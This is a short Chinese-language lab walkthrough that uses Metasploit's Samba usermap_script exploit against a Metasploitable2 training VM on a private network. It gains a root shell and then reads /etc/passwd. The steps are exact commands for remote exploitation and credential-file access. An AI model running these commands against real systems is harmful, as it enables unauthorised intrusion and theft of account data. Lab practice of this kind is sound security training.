靶场环境:metasploitable2
靶机地址:192.168.0.109
攻击机地址:192.168.0.114
首先打开kali,启动msf框架
sudo msfdb run
搜索漏洞模块
选择要利用的模块:
use exploit/multi/samba/usermap_script
查看所需要设置的参数
show options
我们看到只需要设置RHOSTS(靶机地址)
set rhosts 192.168.0.109
开始攻击
exploit
攻击成功
试着执行一下ls命令
执行成功
whoami查看当前权限为root
查看靶机ip
ip a
查看敏感文件
cat /etc/passwd
ctrl+c退出